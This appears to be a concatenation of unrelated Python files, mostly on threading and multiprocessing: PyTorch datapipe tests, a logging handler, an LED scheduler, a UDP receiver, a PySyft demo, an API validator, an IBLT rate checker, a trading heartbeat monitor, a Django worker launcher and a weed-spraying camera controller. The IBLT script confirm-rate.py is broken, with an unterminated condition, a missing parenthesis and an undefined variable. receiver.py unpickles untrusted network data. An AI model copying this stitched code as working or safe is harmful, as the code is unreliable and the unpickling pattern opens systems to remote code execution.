expected: Dict[Any, Any] = {mapped_dp: {numbers_dp: {}}}
self.assertEqual(expected, graph)
@skipIfNoDill
def test_traverse_forked(self):
numbers_dp = NumbersDataset(size=50)
dp0, dp1, dp2 = numbers_dp.fork(num_instances=3)
dp0_upd = dp0.map(lambda x: x * 10)
dp1_upd = dp1.filter(lambda x: x % 3 == 1)
combined_dp = dp0_upd.mux(dp1_upd, dp2)
graph = torch.utils.data.graph.traverse(combined_dp)
expected = {combined_dp: {dp0_upd: {dp0: {dp0.main_datapipe: {dp0.main_datapipe.main_datapipe: {}}}},
dp1_upd: {dp1: {dp1.main_datapipe: {dp1.main_datapipe.main_datapipe: {}}}},
dp2: {dp2.main_datapipe: {dp2.main_datapipe.main_datapipe: {}}}}}
self.assertEqual(expected, graph)
class TestSharding(TestCase):
def _get_pipeline(self):
numbers_dp = NumbersDataset(size=10)
dp0, dp1 = numbers_dp.fork(num_instances=2)
dp0_upd = dp0.map(lambda x: x * 10)
dp1_upd = dp1.filter(lambda x: x % 3 == 1)
combined_dp = dp0_upd.mux(dp1_upd)
return combined_dp
@skipIfNoDill
def test_simple_sharding(self):
sharded_dp = self._get_pipeline().sharding_filter()
torch.utils.data.sharding.apply_sharding(sharded_dp, 3, 1)
items = list(sharded_dp)
self.assertEqual([1, 20, 40, 70], items)
all_items = list(self._get_pipeline())
items = []
for i in range(3):
sharded_dp = self._get_pipeline().sharding_filter()
torch.utils.data.sharding.apply_sharding(sharded_dp, 3, i)
items += list(sharded_dp)
self.assertEqual(sorted(all_items), sorted(items))
def test_sharding_length(self):
numbers_dp = dp.iter.IterableWrapper(range(13))
sharded_dp0 = numbers_dp.sharding_filter()
torch.utils.data.sharding.apply_sharding(sharded_dp0, 3, 0)
sharded_dp1 = numbers_dp.sharding_filter()
torch.utils.data.sharding.apply_sharding(sharded_dp1, 3, 1)
sharded_dp2 = numbers_dp.sharding_filter()
torch.utils.data.sharding.apply_sharding(sharded_dp2, 3, 2)
self.assertEqual(13, len(numbers_dp))
self.assertEqual(5, len(sharded_dp0))
self.assertEqual(4, len(sharded_dp1))
self.assertEqual(4, len(sharded_dp2))
numbers_dp = dp.iter.IterableWrapper(range(1))
sharded_dp0 = numbers_dp.sharding_filter()
torch.utils.data.sharding.apply_sharding(sharded_dp0, 2, 0)
sharded_dp1 = numbers_dp.sharding_filter()
torch.utils.data.sharding.apply_sharding(sharded_dp1, 2, 1)
self.assertEqual(1, len(sharded_dp0))
self.assertEqual(0, len(sharded_dp1))
@skipIfNoDill
def test_old_dataloader(self):
dp0 = self._get_pipeline()
expected = list(dp0)
dp0 = self._get_pipeline().sharding_filter()
dl = DataLoader(dp0, batch_size=1, shuffle=False, num_workers=2,
worker_init_fn=torch.utils.data.backward_compatibility.worker_init_fn)
items = []
for i in dl:
items.append(i)
self.assertEqual(sorted(expected), sorted(items))
if __name__ == '__main__':
run_tests()
|
multiprocessing_logging.py
|
# vim : fileencoding=UTF-8 :
from __future__ import absolute_import, division, unicode_literals
import logging
import multiprocessing
import sys
import threading
import traceback
__version__ = '0.2.4'
def install_mp_handler(logger=None):
"""Wraps the handlers in the given Logger with an MultiProcessingHandler.
:param logger: whose handlers to wrap. By default, the root logger.
"""
if logger is None:
logger = logging.getLogger()
for i, orig_handler in enumerate(list(logger.handlers)):
handler = MultiProcessingHandler(
'mp-handler-{0}'.format(i), sub_handler=orig_handler)
logger.removeHandler(orig_handler)
logger.addHandler(handler)
class MultiProcessingHandler(logging.Handler):
def __init__(self, name, sub_handler=None):
super(MultiProcessingHandler, self).__init__()
if sub_handler is None:
sub_handler = logging.StreamHandler()
self.sub_handler = sub_handler
self.queue = multiprocessing.Queue(-1)
self.setLevel(self.sub_handler.level)
self.setFormatter(self.sub_handler.formatter)
# The thread handles receiving records asynchronously.
t = threading.Thread(target=self.receive, name=name)
t.daemon = True
t.start()
def setFormatter(self, fmt):
logging.Handler.setFormatter(self, fmt)
self.sub_handler.setFormatter(fmt)
def receive(self):
while True:
try:
record = self.queue.get()
self.sub_handler.emit(record)
except (KeyboardInterrupt, SystemExit):
raise
except EOFError:
break
except:
traceback.print_exc(file=sys.stderr)
def send(self, s):
self.queue.put_nowait(s)
def _format_record(self, record):
# ensure that exc_info and args
# have been stringified. Removes any chance of
# unpickleable things inside and possibly reduces
# message size sent over the pipe.
if record.args:
record.msg = record.msg % record.args
record.args = None
if record.exc_info:
self.format(record)
record.exc_info = None
return record
def emit(self, record):
try:
s = self._format_record(record)
self.send(s)
except (KeyboardInterrupt, SystemExit):
raise
except:
self.handleError(record)
def close(self):
self.sub_handler.close()
logging.Handler.close(self)
|
threadScheduler.py
|
import threading
import os.path
import time
import config
from LED_Sequences import * # Import all sequences
from LED_Controller import RenderLoop
import json
def PollLEDSequence(path):
"""
function to repeatedly read the LED_Sequence file to see which mode is selected and start the particular thread
"""
count = 0
filePath = path + "LED_Sequence"
jsonDict = None
jsonCorrect = False
localLayer = None
localSequence = None
localfunc = None
while config.run:
count += 1
with open(filePath, 'r') as f:
jsonStringInput = f.read()
# Parse json input
try:
jsonDict = json.loads(jsonStringInput)
except ValueError as e:
# Check for exit condition
if jsonStringInput == "exit":
exit() # Call to: LED_Sequences.exit()
jsonCorrect = False
else:
if "sequence" in jsonDict and "layer" in jsonDict:
jsonCorrect = True
if jsonCorrect:
"""
Input parsed properly. Perform actions.
"""
try:
localLayer = int(jsonDict["layer"])
localfunc = globals()[jsonDict["sequence"]]
except ValueError:
# Layer element cannot be parsed to an int
localLayer = None
localfunc = None
pass
except KeyError:
# Function does not exist for that sequence name
localLayer = None
localfunc = None
pass
else:
# Bound the layer to the max and min values
localLayer = max(localLayer, 0) # Set Min
localLayer = min(localLayer, config.NUM_LAYERS - 1) # Set Max
localSequence = jsonDict["sequence"]
# Perform actions if the layer needs changing
if localSequence != config.layerManager[localLayer]["sequence"]:
# Set the sequence name
config.layerManager[localLayer]["sequence"] = localSequence
# Stop existing threads on the given layer
CloseThread(localLayer)
# Start new sequence on the given layer
config.layerManager[localLayer]["sequence"] = localSequence
print(f'New sequence selected: <{config.layerManager[localLayer]["sequence"]}>')
config.layerManager[localLayer]["run"] = True
config.layerManager[localLayer]["thread"] = threading.Thread(
target=localfunc, name=f'THREAD_{localSequence}', args=(jsonDict,), daemon=True)
config.layerManager[localLayer]["thread"].start()
# else:
# print(f'Continuing sequence: <{LEDSequence}>')
else:
print(f"Invalid JSON: {jsonStringInput}")
time.sleep(1)
print("exiting PollLEDSequence thread")
def CloseThread(layer):
if config.layerManager[layer]["thread"] is not None:
print(f'Poll closing thread: <{config.layerManager[layer]["thread"].name}>')
config.layerManager[layer]["run"] = False
config.layerManager[layer]["thread"].join()
# Clear the pixels on the ending thread.
config.stripLayersLocks[layer].acquire()
config.stripLayers[layer] = [None] * config.NUM_PIXELS
config.stripLayersLocks[layer].release()
config.layerManager[layer]["thread"] = None
if __name__ == "__main__":
# creating threads
primaryThreads = []
# Thread to poll Sequence file to begin other threads
primaryThreads.append(threading.Thread(
target=PollLEDSequence, name='THREAD_Poll', args=('../transfer/',), daemon=True))
# Thread to render the virtual pixel values to the physical strip
primaryThreads.append(threading.Thread(
target=RenderLoop, name='THREAD_Render', args=(), daemon=True))
# starting primary threads
for t in primaryThreads:
t.start()
# Continue along main thread
curpath = os.path.abspath(os.curdir)
print("Current path is: %s" % (curpath))
# Continuously poll keyboard input
while config.run:
# i = input("Enter text ('exit' to quit): ")
# print(f'Input received: <{i}>')
# if not i:
# break
# with open("../transfer/LED_Sequence", "w") as f:
# f.write(i)
pass
print("Keyboard loop has exited")
for layer in config.layerManager:
if layer["thread"] is not None:
print(f'Closing layer {config.layerManager.index(layer)} thread: {layer["thread"].name}')
layer["run"] = False
layer["thread"].join()
layer["thread"] = None
layer["sequence"] = ''
config.run = False
# wait until primary threads are completely executed
for t in primaryThreads:
t.join()
# Clear the current sequence
with open("../transfer/LED_Sequence", "w") as f:
f.write('')
# All threads completely executed
print("Goodbye!")
|
receiver.py
|
import pickle
import socket
import random
import threading
from Utils import Config, RecvLogConfig, CRC
recv_config = Config() #读取配置文件
recv_log_config = RecvLogConfig() #读取日志配置
recv_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) #服务端socket
recv_socket.bind(recv_config.recv_addr)
recv_file = open(recv_config.recv_file, 'wb') #以二进制写方式打开文件,没有则创建文件
#是否丢失
def should_lost():
global recv_config
#产生一个1~lost_rate的随机数,如果刚好等于lost_rate返回True
return True if random.randint(1, recv_config.lost_rate) == recv_config.lost_rate else False
#接受数据帧
def receive_pdu():
global recv_config
global recv_log_config
global recv_socket
global recv_file
recv_log = open(recv_config.recv_log, 'w') #创建日志
while True:
pdu, send_addr = recv_socket.recvfrom(recv_config.data_size * 2) #接受数据帧
if should_lost(): #数据帧丢失
continue
else: #未丢失
recv_log_config.num_to_recv += 1 #接受次数+1
pdu = pickle.loads(pdu) #解析数据
recv_log_config.pdu_recv = pdu['pdu_to_send'] #获取接受的pdu序号
if CRC().calculate(pdu['data']) != int(pdu['checksum']): #数据出现错误
recv_log_config.status = 'DataErr'
log = recv_log_config.get_log() #获取日志
print(log)
else: #数据未出错
if recv_log_config.pdu_exp != pdu['pdu_to_send']: #序号错误
recv_log_config.status = 'NoErr'
log = recv_log_config.get_log() #获取日志
print(log)
else: #正确接收
recv_log_config.status = 'OK'
log = recv_log_config.get_log() #获取日志
print(log)
ack = recv_log_config.pdu_exp #获取应该返回的ack
threading.Thread(target=send_ack, args=(pickle.dumps(ack), send_addr)).start() #返回ack
if len(pdu['data']) == 0: #收到空数据,文件已发送完毕
recv_file.close()
print('receive complete')
recv_log.write('receive complete\n')
recv_log.close()
return
recv_file.write(pdu['data']) #将收到的数据写入文件
recv_log_config.pdu_exp += 1
recv_log.write(log + '\n') #写入日志
#返回ack
def send_ack(ack, send_addr):
global recv_socket
recv_socket.sendto(ack, send_addr)
if __name__ == '__main__':
receive_pdu()
|
send_tensor.py
|
# stdlib
import multiprocessing as mp
from multiprocessing import Process
import time
# third party
import torch as th
# syft absolute
import syft as sy
mp.set_start_method("spawn", force=True)
# Make sure to run the local network.py server first:
#
# $ syft-network
#
def do() -> None:
# stdlib
import asyncio
loop = asyncio.new_event_loop()
asyncio._set_running_loop(loop)
_ = sy.logger.add(
sink="syft_do.log",
level="TRACE",
)
duet = sy.launch_duet(loopback=True, network_url="http://localhost:5000")
duet.requests.add_handler(action="accept", name="gimme")
t = th.randn(4000000)
print("DO: Tensor sum:", t.sum())
start = time.time()
tp = t.send(duet, searchable=True)
end = time.time()
print("DO: Pointer: ", tp, "serialized in", end - start)
print("DO: Store: ", duet.store)
loop.run_forever()
print("DO: DONE")
def ds() -> None:
# stdlib
import asyncio
loop = asyncio.new_event_loop()
asyncio._set_running_loop(loop)
_ = sy.logger.add(
sink="syft_ds.log",
level="TRACE",
)
duet = sy.join_duet(loopback=True, network_url="http://localhost:5000")
time.sleep(1)
print("DS: Store: ", duet.store)
start = time.time()
t = duet.store[0].get(
request_block=True, timeout_secs=30, name="gimme", delete_obj=False
)
end = time.time()
print("DS: Received in:", end - start)
print("DS: Shape: ", t.shape)
print("DS: Tensor sum:", t.sum())
if __name__ == "__main__":
p1 = Process(target=do)
p1.start()
p2 = Process(target=ds)
p2.start()
p2.join()
p1.terminate()
|
test.py
|
#!/usr/bin/python2
import sys
import json
import urllib2
import threading
import Queue
import glob
import os
import jsonschema
hdr = { 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11',
'Accept': 'application/json,text/javascript,application/jsonrequest;q=0.9,*/*;q=0.8',
'Accept-Charset': 'ISO-8859-1,utf-8;q=0.7,*;q=0.3',
'Accept-Encoding': 'none',
'Content-Type': 'application/json',
'Connection': 'keep-alive' }
ff_api_specs = {}
def read_url(url, queue):
req = urllib2.Request(url, headers=hdr)
try:
res = urllib2.urlopen(req, None, 10)
api_content = {}
api_content = json.loads(res.read())
validator = jsonschema.validators.validator_for(ff_api_specs[api_content['api']]['schema'])
validator.check_schema(ff_api_specs[api_content['api']]['schema'])
v = validator(ff_api_specs[api_content['api']]['schema'])
result = v.iter_errors(api_content)
has_error = False
text_result = ''
for error in sorted(result,key=str):
if not has_error:
text_result = 'ValidationError in community file %s:\n' % (api_content['name'])
has_error = True
text_result = '%s\t Error in %s: %s\n' % (text_result, '->'.join(str(path) for path in error.path), error.message)
if has_error:
text_result = '%s\t Url: %s\n' %(text_result, url)
print(text_result)
queue.put(url)
except urllib2.HTTPError as e:
print('HTTPError: %s: %s' % (e.code, url))
queue.put(url)
except urllib2.URLError as e:
print('URLError: %s: %s' % (e.reason, url))
queue.put(url)
except ValueError as e:
print('Value error while paring JSON: %s' % (url))
queue.put(url)
except KeyError as e:
print('Invalid or unknown API version %s: %s' % (api_content['api'], url))
queue.put(url)
# else:
# print 'OK %s: %s' % (api_content['api'], url)
def fetch_parallel(urls_to_load):
result = Queue.Queue()
threads = [threading.Thread(target=read_url, args = (url, result)) for url in urls_to_load]
for t in threads:
t.start()
for t in threads:
t.join()
return result
def main():
j = open('./directory.json').read()
obj = json.loads(j)
spec_dir = './api.freifunk.net/specs/*.json'
spec_files = glob.glob(spec_dir)
for spec_file in spec_files:
spec_content = open(spec_file).read()
ff_api_specs[os.path.splitext(os.path.basename(spec_file))[0]] = json.loads(spec_content)
urls_to_load = []
invalid_urls = []
for x in obj:
urls_to_load.append(obj[x])
result = fetch_parallel(urls_to_load)
if result.empty():
print('Result: All URLs are valid :-)')
sys.exit(0)
else:
print('\nResult: Invalid URLs found :-(')
sys.exit(1)
if __name__ == '__main__':
main()
|
confirm-rate.py
|
from pyblt import *
import random
import gc
import math
import csv
from multiprocessing import Process, Lock
import os
PROCESSES = 4
def trial(hedge,k,entries):
trials=0
successes=0
while (True):
p=PYBLT(entries=entries,value_size=9,hedge=hedge,num_hashes=k)
for _ in range(entries):
p.insert(random.getrandbits(32), 0)
if (p.list_entries()[0]==True):
successes+=1
trials+=1
ssize=p.get_serialized_size()
prob = successes/trials
if successes<trials:
ci = 1.96*math.sqrt(prob*(1-prob)/trials)
else:
ci = -(math.exp(math.log(.05)/trials)-1)
if ( ci<=(1/240)/3 ):
return successes,trials,prob,ci,ssize
def validate_rows(lock,m):
count=0
with open(sys.argv[1],'r') as fd:
fd.readline()
for row in csv.reader(fd, delimiter=','):
n,hedge,keys,size, goal = row
n=int(n)
if (n!=m+PROCESSES*count):
continue
count+=1
hedge=float(hedge)
keys=int(keys)
goal=float(goal)
size=int(size)
test_passed=True
# first independent trial
successes1,trials1,prob1,ci1,ssize1 = trial(hedge,keys,n)
# check size of the IBLT
if not (ssize == size):
# this should not probabilistic and should always pass
lock.acquire()
print (n,"FAIL: size test")
lock.release()
return()
# second independent trial
successes2,trials2,prob2,ci2,ssize2 = trial(hedge,keys,n)
# check decode rate of the IBLT
if (not (prob1-ci1 >= goal or (goal>prob1-ci1 and goal<prob1+ci1))) or
(not (prob2-ci2 >= goal or (goal>prob2-ci2 and goal<prob2+ci2))):
lock.acquire()
print (n,"Double check decode rates for %d items:\t%f\t%f" %(n,prob1,prob2)
lock.release()
lock.acquire()
print("%d, %f, %d, %d, %d, %f, %f, %d, %f, %f, %d" % (n, hedge, keys,
successes1, trials1, prob1,
successes2, trials2, prob2))
lock.release()
return()
lock = Lock()
# count from 1; can't have an IBLT with 0 entries
for num in range(1,PROCESSES+1):
Process(target=validate_rows, args=(lock, num)).start()
|
heartbeat.py
|
# -*- coding: utf-8 -*-
# ==========================================
# Discord
# ==========================================
import time
from datetime import datetime, timedelta, timezone
# thred操作
import threading
# from puppeteer import Puppeteer
# ==============================================================
# Heartbeat クラス
# param:
# puppeteer: Puppeteerオブジェクト
# ==============================================================
class Heartbeat:
# ==========================================================
# 初期化
# param:
# puppeteer: Puppeteerオブジェクト
# ==========================================================
def __init__(self, Puppeteer):
self._exchange = Puppeteer._exchange # 取引所オブジェクト(ccxt.bitmex)
self._logger = Puppeteer._logger # logger
self._config = Puppeteer._config # 定義ファイル
self._ws = Puppeteer._ws # websocket
self._bitmex = Puppeteer._bitmex # ccxt.bimexラッパーオブジェクト
self._discord = Puppeteer._discord # discord
self._puppeteer = Puppeteer # puppeteer
# websocketが無効
if not self._config["USE_WEBSOCKET"]:
self._logger.warning("heartbeat check is None. because [not websocket]")
# -------------------------------------------------------
# 開始時刻のタイムスタンプ
# -------------------------------------------------------
self._tz = timezone.utc
self._ts = datetime.now(self._tz).timestamp()
# -------------------------------------------------------
# 資産状況通知スレッド
# -------------------------------------------------------
self._check_heart_beat_thread = threading.Thread(
target=self.__run, args=("check_heart_beat",)
)
self._check_heart_beat_thread.daemon = True
self._check_heart_beat_thread.start()
self._logger.debug("Started check heart beat thread")
# ===========================================================
# デストラクタ
# ===========================================================
def __del__(self):
self._check_heart_beat_thread.join(timeout=3) # この値が妥当かどうか検討する
# ==========================================================
# run
# ==========================================================
def __run(self, args):
while True:
# ---------------------------------------------------
# 時刻が0秒をすぎたら実行する
# ---------------------------------------------------
while datetime.now(self._tz).second not in [0, 1, 2]:
time.sleep(0.5)
# 開始
start = time.time()
self._ts = datetime.now(self._tz).timestamp()
# ---------------------------------------------------
# メイン処理
# ---------------------------------------------------
try:
# -----------------------------------------------
# Puppeteer動作heart beat
# -----------------------------------------------
if self._ts - self._puppeteer._ts > 60:
# Puppeteerの実行が60秒停止していた場合
self._logger.error(
"puppeteer ts:{}, diff:{}".format(
self._puppeteer._ts, self._ts - self._puppeteer._ts
)
)
# websocket 再接続
self._puppeteer._ws.exited = False
self._puppeteer._ws.reconnect()
# -----------------------------------------------
# websocke動作heart beat
# -----------------------------------------------
elif self._ts - self._ws._ts > 60:
# websocketのデータ受信が60秒以上停止していたら
self._logger.error(
"websocket ts:{}, diff:{}, status:{}".format(
self._ws._ts, self._ts - self._ws._ts, self._ws._ws_status
)
)
# websocket 再接続
self._puppeteer._ws.exited = False
self._puppeteer._ws.reconnect()
except Exception as e:
self._logger.error("check heart beat thread: Exception: {}".format(e))
time.sleep(5)
# 終了
end = time.time()
elapsed_time = end - start
# ---------------------------------------------------
# 時間調整
# ---------------------------------------------------
if elapsed_time >= 60:
# それほど時間を消費することはないと思うが、念のため
self._logger.warning(
"check heart beat thread: use time {}".format(elapsed_time)
)
else:
# 毎時毎分0秒の5秒前までスリープしていることにする
now_sec = datetime.now(self._tz).second
if now_sec >= 55:
pass
else:
time.sleep(55 - now_sec)
|
main.py
|
# Setup logs
import django
import logging
import os
import threading
from django.utils import timezone
import time
logging.basicConfig(level=os.environ['LOG_LEVEL'])
logger = logging.getLogger(__name__)
parallelism = int(os.environ['DUEL_PARALLELISM'])
do_tag = os.environ.get('DO_TAG')
# Start Django in stand-alone mode
logger.info('Setup django')
django.setup()
if __name__ == "__main__":
from duel_runner.smoke import SmokeController
from duel_runner.tournament import TournamentController
from core.models import TaskWorker
logger.info('Start app')
smoke = SmokeController()
tournament = TournamentController()
threads = []
task_worker = None
if do_tag:
# Mark worker as ready
task_worker = TaskWorker.objects.get(tag=do_tag)
logger.info(f'Set task worker {task_worker} as ready')
task_worker.state = TaskWorker.READY
task_worker.ready_at = timezone.now()
task_worker.save()
smoke.task_worker = task_worker
tournament.task_worker = task_worker
for i in range(parallelism):
# Start one thread for each controller
threads.append(threading.Thread(target=smoke.run))
threads.append(threading.Thread(target=tournament.run))
for t in threads:
t.start()
if do_tag:
# Monitor for stop signal
while True:
time.sleep(15)
task_worker.refresh_from_db()
if task_worker.state != TaskWorker.READY:
logger.info(f'Handling stop signal')
smoke.stop = True
tournament.stop = True
break
else:
logger.info('Standalone mode')
# Wait for all tasks to end
for t in threads:
t.join()
if do_tag:
# Mark worker as done
logger.info(f'Set task worker {task_worker} as stopped')
task_worker.state = TaskWorker.STOPPED
task_worker.stopped_at = timezone.now()
task_worker.save()
|
greenonbrown.py
|
#!/home/pi/.virtualenvs/owl/bin/python3
from algorithms import exg, exg_standardised, exg_standardised_hue, hsv, exgr, gndvi
from button_inputs import Selector, Recorder
from image_sampler import image_sample
from imutils.video import VideoStream, FileVideoStream, FPS
from relay_control import Controller
from queue import Queue
from time import strftime
import subprocess
import imutils # reference PyImageSearch
import shutil
import numpy as np # reference
import time
import sys
import cv2 # reference
import os
def nothing(x):
pass
def green_on_brown(image, exgMin=30, exgMax=250, hueMin=30, hueMax=90, brightnessMin=5, brightnessMax=200, saturationMin=30,
saturationMax=255, minArea=1, headless=True, algorithm='exg'):
'''
Uses a provided algorithm and contour detection to determine green objects in the image. Min and Max
thresholds are provided.
:param image: input image to be analysed
:param exgMin:
:param exgMax:
:param hueMin:
:param hueMax:
:param brightnessMin:
:param brightnessMax:
:param saturationMin:
:param saturationMax:
:param minArea: minimum area for the detection - used to filter out small detections
:param headless: True: no windows display; False: watch what the algorithm does
:param algorithm: the algorithm to use. Defaults to ExG if not correct
:return:
'''
# different algorithm options, add in your algorithm here if you make a new one!
threshedAlready = False
if algorithm == 'exg':
output = exg(image)
elif algorithm == 'exgr':
output = exgr(image)
elif algorithm == 'nexg':
output = exg_standardised(image)
elif algorithm == 'exhsv':
output = exg_standardised_hue(image, hueMin=hueMin, hueMax=hueMax,
brightnessMin=brightnessMin, brightnessMax=brightnessMax,
saturationMin=saturationMin, saturationMax=saturationMax)
elif algorithm == 'hsv':
output, threshedAlready = hsv(image, hueMin=hueMin, hueMax=hueMax,
brightnessMin=brightnessMin, brightnessMax=brightnessMax,
saturationMin=saturationMin, saturationMax=saturationMax)
elif algorithm == 'gndvi':
output = gndvi(image)
else:
output = exg(image)
print('[WARNING] DEFAULTED TO EXG')
if not headless:
cv2.imshow("Threshold", output)
# run the thresholds provided
kernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (3, 3))
# if not a binary image, run an adaptive threshold on the area that fits within the thresholded bounds.
if not threshedAlready:
output = np.where(output > exgMin, output, 0)
output = np.where(output > exgMax, 0, output)
output = np.uint8(np.abs(output))
if not headless:
cv2.imshow("post", output)
thresholdOut = cv2.adaptiveThreshold(output, 255, cv2.ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY_INV, 31, 2)
thresholdOut = cv2.morphologyEx(thresholdOut, cv2.MORPH_CLOSE, kernel, iterations=1)
# if already binary, run morphological operations to remove any noise
if threshedAlready:
thresholdOut = cv2.morphologyEx(output, cv2.MORPH_CLOSE, kernel, iterations=5)
if not headless:
cv2.imshow("Threshold", thresholdOut)
# find all the contours on the binary images
cnts = cv2.findContours(thresholdOut.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
cnts = imutils.grab_contours(cnts)
weedCenters = []
boxes = []
# loop over all the detected contours and calculate the centres and bounding boxes
for c in cnts:
# filter based on total area of contour
if cv2.contourArea(c) > minArea:
# calculate the min bounding box
startX, startY, boxW, boxH = cv2.boundingRect(c)
endX = startX + boxW
endY = startY + boxH
cv2.rectangle(image, (int(startX), int(startY)), (endX, endY), (0, 0, 255), 2)
# save the bounding box
boxes.append([startX, startY, boxW, boxH])
# compute box center
centerX = int(startX + (boxW / 2))
centerY = int(startY + (boxH / 2))
weedCenters.append([centerX, centerY])
# returns the contours, bounding boxes, centroids and the image on which the boxes have been drawn
return cnts, boxes, weedCenters, image
# the
class Owl:
def __init__(self, video=False, videoFile=None, recording=False, nozzleNum=4, headless=True,
exgMin=30, exgMax=180, hueMin=30,hueMax=92, brightnessMin=5, brightnessMax=200,
saturationMin=30, saturationMax=255, resolution=(832, 624), framerate=32):
# different detection parameters
self.headless = headless
self.recording = recording
self.resolution = resolution
self.framerate = framerate
# threshold parameters for different algorithms
self.exgMin = exgMin
self.exgMax = exgMax
self.hueMin = hueMin
self.hueMax = hueMax
self.saturationMin = saturationMin
self.saturationMax = saturationMax
self.brightnessMin = brightnessMin
self.brightnessMax = brightnessMax
# setup the track bars if headless is False
if not self.headless:
# create trackbars for the threshold calculation
cv2.namedWindow("Params")
cv2.createTrackbar("thresholdMin", "Params", self.exgMin, 255, nothing)
cv2.createTrackbar("thresholdMax", "Params", self.exgMax, 255, nothing)
# instantiate the recorder if recording is True
if self.recording:
self.fourcc = cv2.VideoWriter_fourcc(*'MJPG')
self.writer = None
else:
self.record = False
self.saveRecording = False
# check if test video or videostream from camera
if video:
self.cam = FileVideoStream(videoFile).start()
# if no video, start the camera with the provided parameters
else:
try:
self.cam = VideoStream(usePiCamera=True, resolution=self.resolution, framerate=self.framerate).start()
except ModuleNotFoundError:
self.cam = VideoStream(src=0).start()
time.sleep(1.0)
# set the sprayqueue size
self.sprayQueue = Queue(maxsize=10)
# nozzleDict maps the reference nozzle number to a boardpin on the embedded device
self.nozzleDict = {
0: 13,
1: 15,
2: 16,
3: 18
}
### Data collection only ###
# algorithmDict maps pins to algorithms for data collection
self.algorithmDict = {
"exg": 29,
"nexg": 31,
"hsv": 33,
"exhsv": 35,
}
# this is where the recording button can be added. Currently set to pin 37
if self.recording:
self.recorderButton = Recorder(recordGPIO=37)
############################
# instantiate the nozzle controller - successful start should beep the buzzer
self.controller = Controller(nozzleDict=self.nozzleDict)
# instantiate the logger
self.logger = self.controller.logger
# sensitivity and weed size to be added
self.sensitivity = None
self.laneCoords = {}
# add the total number of nozzles. This can be changed easily, but the nozzleDict and physical relays would need
# to be updated too. Fairly straightforward, so an opportunity for more precise application
self.nozzleNum = nozzleNum
def hoot(self, sprayDur, sample=False, sampleDim=400, saveDir='output', camera_name='cam1', algorithm='exg', selectorEnabled=False, minArea=10):
# track FPS and framecount
fps = FPS().start()
if selectorEnabled:
self.selector = Selector(switchDict=self.algorithmDict)
try:
while True:
frame = self.cam.read()
if selectorEnabled:
algorithm, newAlgorithm = self.selector.algorithm_selector(algorithm)
if newAlgorithm:
self.logger.log_line('[NEW ALGO] {}'.format(algorithm))
if self.recording:
self.record = self.recorderButton.record
self.saveRecording = self.recorderButton.saveRecording
if frame is None:
fps.stop()
print("[INFO] Stopped. Approximate FPS: {:.2f}".format(fps.fps()))
self.stop()
break
if self.record and self.writer is None:
saveDir = os.path.join(saveDir, strftime("%Y%m%d-{}-{}".format(camera_name, algorithm)))
if not os.path.exists(saveDir):
os.makedirs(saveDir)
self.baseName = os.path.join(saveDir, strftime("%Y%m%d-%H%M%S-{}-{}".format(camera_name, algorithm)))
videoName = self.baseName + '.avi'
self.logger.new_video_logfile(name=self.baseName + '.txt')
self.writer = cv2.VideoWriter(videoName, self.fourcc, 30, (frame.shape[1], frame.shape[0]), True)
# retrieve the trackbar positions for thresholds
if not self.headless:
self.exgMin = cv2.getTrackbarPos("thresholdMin", "Params")
self.exgMax = cv2.getTrackbarPos("thresholdMax", "Params")
else:
# this leaves it open to adding dials for sensitivity. Static at the moment, but could be dynamic
self.update(exgMin=self.exgMin, exgMax=self.exgMax) # add in update values here
# pass image, thresholds to green_on_brown function
cnts, boxes, weedCentres, imageOut = green_on_brown(frame.copy(), exgMin=self.exgMin,
exgMax=self.exgMax,
hueMin=self.hueMin,
hueMax=self.hueMax,
saturationMin=self.saturationMin,
saturationMax=self.saturationMax,
brightnessMin=self.brightnessMin,
brightnessMax=self.brightnessMax,
headless=self.headless,
algorithm=algorithm, minArea=minArea)
##### IMAGE SAMPLER #####
# record sample images if required of weeds detected
# uncomment if needed
# if frameCount % 60 == 0 and sample is True:
# saveFrame = frame.copy()
# sampleThread = Thread(target=image_sample, args=[saveFrame, weedCentres, saveDir, sampleDim])
# sampleThread.start()
#########################
# activation region limit - once weed crosses this line, nozzle is activated
self.yAct = int((0.2) * frame.shape[0])
laneWidth = imageOut.shape[1] / self.nozzleNum
# calculate lane coords and draw on frame
for i in range(self.nozzleNum):
laneX = int(i * laneWidth)
# cv2.line(displayFrame, (laneX, 0), (laneX, imageOut.shape[0]), (0, 255, 255), 2)
self.laneCoords[i] = laneX
# loop over the ID/weed centres from contours
for ID, centre in enumerate(weedCentres):
# if they are in activation region the spray them
if centre[1] > self.yAct:
sprayTime = time.time()
for i in range(self.nozzleNum):
# determine which lane needs to be activated
if int(self.laneCoords[i]) <= centre[0] < int(self.laneCoords[i] + laneWidth):
# log a spray job with the controller using the nozzle, timestamp and spray duration
self.controller.receive(nozzle=i, timeStamp=sprayTime, duration=sprayDur)
# update the framerate counter
fps.update()
if not self.headless:
cv2.imshow("Output", imutils.resize(imageOut, width=600))
if self.record and not self.saveRecording:
self.writer.write(frame)
if self.saveRecording and not self.record:
self.writer.release()
self.controller.solenoid.beep(duration=0.1)
self.recorderButton.saveRecording = False
fps.stop()
self.writer = None
self.logger.log_line_video("[INFO] {}. Approximate FPS: {:.2f}".format(self.baseName, fps.fps()), verbose=True)
fps = FPS().start()
k = cv2.waitKey(1) & 0xFF
if k == 27:
fps.stop()
self.logger.log_line_video("[INFO] Stopped. Approximate FPS: {:.2f}".format(fps.fps()), verbose=True)
self.stop()
break
except KeyboardInterrupt:
fps.stop()
self.logger.log_line_video("[INFO] Stopped. Approximate FPS: {:.2f}".format(fps.fps()), verbose=True)
self.stop()
except Exception as e:
self.controller.solenoid.beep(duration=0.5, repeats=5)
self.logger.log_line("[CRITICAL ERROR] STOPPED: {}".format(e))
# still in development
def update_software(self):
USBDir, USBConnected = check_for_usb()
if USBConnected:
files = os.listdir(USBDir)
workingDir = '/home/pi'
# move old version to version control directory first
oldVersionDir = strftime(workingDir + "/%Y%m%d-%H%M%S_update")
os.mkdir(oldVersionDir)
currentDir = '/home/pi/owl'
shutil.move(currentDir, oldVersionDir)
# move new directory to working directory
for item in files:
if 'owl' in item:
shutil.move()
def stop(self):
self.controller.running = False
self.controller.solenoid.all_off()
self.controller.solenoid.beep(duration=0.1)
self.controller.solenoid.beep(duration=0.1)
self.cam.stop()
